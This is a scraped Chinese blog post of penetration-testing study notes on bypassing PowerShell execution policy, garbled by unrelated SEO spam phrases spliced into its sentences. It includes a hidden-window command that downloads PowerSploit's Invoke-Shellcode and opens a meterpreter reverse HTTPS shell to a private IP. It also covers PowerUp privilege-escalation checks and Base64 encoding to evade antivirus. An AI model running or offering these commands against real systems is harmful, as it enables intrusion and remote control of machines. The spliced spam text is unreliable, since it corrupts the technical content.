TowerBridge是什么意思erBridge在线翻译读音-雅虎在线翻译


2023年4月4日发(作者:福建省最新任命25名厅级干部)

《内⽹安全攻防》学习笔记【1】

内⽹安全攻涣然冰释造句 防

0x01前⾔

还是回归常态了有道云笔记⽤的我不归园田居其一ppt 太舒服⽤这个记⼀下笔记吧,最近开始学内⽹渗透⽅⾯,但是也没有⼀个那种系统的学习⽅法,就先

啃着这本书在看看⼀些⼤佬的⽂章来⼊门。⽂章随缘写,巩固基础,看到哪写到哪,我在思考分开写⽂章还是合理来就在这篇保持更新

0x02PowerShell的使⽤

hell的执⾏策略

为防⽌恶意脚本的执⾏,PowerShell有⼀个执⾏策略,默认情况下,这个执⾏策略被设置为受限。

我们可以使⽤:Get-ExecutionPolicy命令查看PowerShell当前的执⾏策略。它有4个策略。

Restricted:脚本不能运⾏(默认设置)

RemoteSigned:本地创建的脚本可以运⾏,但是从⽹上下载的脚本不能运⾏(拥有数字证书签名的除外)

AllSigned:仅当脚本由受信任的发布者签名时才能运⾏;

Unrestricted:允许所有的脚本执⾏

可⽤这条cmdlit命令设置PowerShell的执⾏策略Set-ExecutionPolicy

注:PowerShell命令不区分⼤⼩写

2.常⽤⽅法

⾸先,⼀个PowerShell脚本其实就是⼀个简单的⽂本⽂件,需要在⽂件名后加上.ps1拓展名

其次想要运⾏PowerShell脚本,必须⽤管理员权限将策略从Restricted变成Unresttricted那么我们在渗透时,就要⽤⼀些⽅法去绕过策略

(1)绕过本地权限并执⾏

1

参数说明:

-ExecutionPolicyBypass(-ExecBypass):绕过执⾏安全策略,这个参数⾮常重要,在默认情况下,PowerShell的安全策略规定了

PowerShell不允许运⾏命令和⽂件。

通过设置这个参数,可以绕过任意⼀个安全保护规则。在渗透测试中,基本每次运⾏PowerShell脚本时都要使⽤这个参数。-----校长

测试⼀下好像对⽬录的要求还挺严格

写到这⾥搜了⼀下powerup是⼀个powershell框架

这⾥我看了⼀下我电脑⾃带了这个⽤Get-Command-Modulepowerup命令查看有没有

但是我猜可能渗透的时候⽬标服务器没有所以都会写上传1脚本?主要看到各种地⽅都写了这⼀步,不知道⾃⼰有哪⾥理解错了,

就也写下来吧

通常,在Windows下可以通过内核漏洞来提升权限。但是,我们常常会碰到⽆法通过内核漏洞提权所处服务器的情况,这个时候就介的组词 需

要利⽤脆弱的Windows服务提权,或者利⽤常见的系统服务,通过其继承的系统权限来完成提权等,此框架可以在内核提权⾏不通的

时候,帮助我们寻找服务器的脆弱点,进⽽同脆弱点实现提权的⽬的。

然后就可以Import-Moudule加载这个脚本了下载的路径根据个⼈情况

-execbypass-Command\"&{Import-Modulec:1;Invoke-AllChecks}\"

Invoke-AllChecks函数将检查⽬标主机的攻击向量以进⾏权限提升

该模块会⾃动执⾏PowerUp下所有的脚本来检查⽬标主机

(2)从⽹站服务器下载脚本绕过本地权限并隐藏执⾏

-ExecutionPolic1

参数说明

-WindowStyleHidden(-wHidden):隐藏窗⼝

-NoLogo:启动不显⽰版权标志的Po孙子兵法与三十六计 电视剧 wershell

-NoProfile(-No落花有意 p):PowerShell控制台不加载当前⽤户的配置⽂件

-NonInteractive(-NonI):⾮交互模式.PowerShell不为⽤户提供交互式的提⽰

-noexit:执⾏后不退出Shell(这个参数在使⽤键盘记录等脚本时⾮常重要)

顺便书上看不明⽩的在校长那看明⽩了

-ExecutionPolicyBypass-WindowStyleHidden-NoProfile-NonIIEX(ent).DownloadString(\'usercont

/c所见的作者 heetz/PowerSploit/master/CodeExecution/1\');Invoke-Shellcode争渡争渡惊起一滩鸥鹭的画面 -Paylo唐诗三百首清明时节雨纷纷全诗 adwindows/meterpreter/reverse_https-Lhost192.168

.82.131-Lport1234

这段是利⽤IEX下载远程PS1脚本绕过权限执⾏链接处只能⽤单引号

隔壁⽂章拓展的我不太看得懂,因为我不会msf等我会了再说

(3)使⽤Base64对PowerShell进⾏编码

使⽤Base64对Powershell命令进⾏编码的⽬的是混淆和压缩代码,从⽽避免脚本因为⼀些特殊字符被杀毒软件查杀

可以使⽤python脚本对命令编码脚本地址在使⽤这个脚本进⾏⽂本转换的时候,对象必须为⽂本⽂件

在上⾯命令后⾯加个>即可

然后给ps_授予执⾏权限

chmod+xps_

(默认是⽤kali的所以windows当然不⾏别问这种奇怪的问题)

编码

./ps_

3.运⾏32位和64位PowerShell

⼀些PowerShell脚本只能运⾏在指定的平台上

在64位的windows系统中存在两个版本的powershell⼀个x64⼀个x86两个版本的执⾏策略不会互相影响x64版本配置⽂件

在%windir%syswow64WindowsPowerShellv1.0

所以执⾏的天气预报最新天气预报 命令如下

32位

-NoP-NonI-WHidden-ExecBypass

64位

%WinDir%-NoP-NonI-WHidden-ExecBypass

暂且休息搭建内⽹环境过段时间再说

更多推荐

restricted是什么意思tricted在线翻译读音